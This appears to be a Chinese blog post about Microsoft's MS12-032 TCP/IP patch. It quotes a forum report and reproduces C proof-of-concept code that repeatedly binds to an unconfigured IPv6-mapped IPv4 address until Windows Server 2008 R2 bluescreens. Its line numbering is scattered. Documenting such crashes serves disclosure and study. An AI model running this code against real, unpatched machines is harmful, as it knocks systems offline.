MS12-032的POC

微软发布了ms12-032的补丁：

http://technet.microsoft.com/en-us/security/bulletin/ms12-032

这个补丁是与TCP/IP协议有关的一个栈溢出问题，可以导致本地提权，目前微软已经要求StackOverflow.com移除这些代码。

老外是这么说的，尝试绑定一个IPV6-mapped IPV4 address，目前只能到crash down

1

We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.

主要的代码是c写的，如下：

1	// the program attempts to bind to IPV6-mapped IPV4 address

2	// in a tight loop. If the address is not configured on the machine

3	// running the program crashes Windows Server 2008 R2 (if program is 32-bit)#include

4	#include <winsock2.h>

5	#include <WS2tcpip.h>

6	#include <windows.h>

7	#include <stdio.h>

8

9	#define IPV6_V6ONLY 27

10

11	void MyWsaStartup()

12

{

13	WORD wVersionRequested;

14	WSADATA wsaData;

15

int err;

16

17	wVersionRequested = MAKEWORD(2, 2);

18

19	err = WSAStartup(wVersionRequested, &wsaData);

20	if (err != 0) {

21	printf("WSAStartup failed with error: %d\n", err);

22

exit(-1);

23

}

24

}

25

26	void main()

27

{

28	MyWsaStartup();

29	bool bindSuccess = false;

30

31	while(!bindSuccess)

32

{

33	SOCKET sock = WSASocket(AF_INET6,

34	SOCK_DGRAM,

35	IPPROTO_UDP,

36

NULL,

37

0,

38	WSA_FLAG_OVERLAPPED);

39	if(sock == INVALID_SOCKET)

40

{

41	printf("WSASocket failed\n");

42

exit(-1);

43

}

44

45	DWORD val = 0;

46	if (setsockopt(sock,

47	IPPROTO_IPV6,

48	IPV6_V6ONLY,

49	(const char*)&val,

50	sizeof(val)) != 0)

51

{

52	printf("setsockopt failed\n");

53	closesocket(sock);

54

exit(-1);

55

}

56

57	sockaddr_in6 sockAddr;

58	memset(&sockAddr, 0, sizeof(sockAddr));

59	sockAddr.sin6_family = AF_INET6;

60	sockAddr.sin6_port = htons(5060);

61

62	// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)

63	// that is [::FFFF:169.13.13.13]

64	sockAddr.sin6_addr.u.Byte[15] = 13;

65	sockAddr.sin6_addr.u.Byte[14] = 13;

66	sockAddr.sin6_addr.u.Byte[13] = 13;

67	sockAddr.sin6_addr.u.Byte[12] = 169;

68	sockAddr.sin6_addr.u.Byte[11] = 0xFF;

69	sockAddr.sin6_addr.u.Byte[10] = 0xFF;

70

71	int size = 28; // 28 is sizeof(sockaddr_in6)

72

73	int nRet = bind(sock, (sockaddr*)&sockAddr, size);

74	if(nRet == SOCKET_ERROR)

75

{

76	closesocket(sock);

77	Sleep(100);

78

}

79

else

80

{

81	bindSuccess = true;

82	printf("bind succeeded\n");

83	closesocket(sock);

84

}

85

}

86

}